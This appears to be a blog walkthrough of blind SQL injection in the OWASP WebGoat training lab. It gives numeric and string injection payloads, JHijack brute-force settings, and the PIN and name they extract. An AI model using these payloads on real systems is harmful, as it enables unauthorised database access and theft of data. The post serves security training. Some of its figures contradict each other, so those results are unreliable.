i Webgoat attack blind SQL injection – All things in moderation

Webgoat attack blind SQL injection

This example using webgoat lab. You can download from: https://sourceforge.net/projects/owaspbwa/

Download tool  Jhijack from: http://yehg.net/lab/pr0js/files.php/jhijackv0.2beta.zip

  1. Blind Numberic SQL injection

1

Response analysis

If( true) return : Account number is valid.

if (false) return : Invalid account number.

 

SQL query analysis

select pin from pins where cc_number='1111222233334444'

attack SQL injection

account_number=101 and 1= ((select pin from pins where cc_number='1111222233334444') =123

blind SQLi using jhijack

2

Set input field:

Host: 192.168.40.128

Port: 80

Url: /WebGoat/attack?Screen=308&menu=1100&SUBMIT=Go%21

Grep: Account number is valid.

SESSID: JSESSIONID=8EC152C944024F89969F3F56A27DC873

HijackID: &account_number=101 and 1= ((select pin from pins where cc_number='1111222233334444') =$ )

Range: $= 1000-5000

Then try run brute force with Hijack button

3

Result:   101 and 1= ((select pin from pins where cc_number=’1111222233334444′) =2364 )

->$=2643

  1. Blind String SQL injection

 6

Response analysis

If( true) return : Account number is valid.

if (false) return : Invalid account number.

SQL query analysis

select name from pins where cc_number='1111222233334444'

blind SQLi using jhijack

Find the length of a name String

Set HijackID:

&account_number=101 AND ((SELECT  LENGTH(name) FROM pins WHERE cc_number='4321432143214321') = $ )

4

-> length =4

Try Blind.

Set HijackID:

&account_number=101 AND ((SELECT  ASCII(SUBSTRING(name, 1, 1)) FROM pins WHERE cc_number='4321432143214321') = $ )

5

->ASCII(name[0]) =  74

In this Function SUBSTRING(str, position, length);

Try Increment “position” then set HijackID

SUBSTRING(name, 2, 1) -> ASCII(name[1]) =  105

SUBSTRING(name, 3, 1) -> ASCII(name[2]) =  108

SUBSTRING(name, 4, 1) -> ASCII(name[3]) =  108

-> result : 74 105 108 108

-> name = Jill

Leave a Reply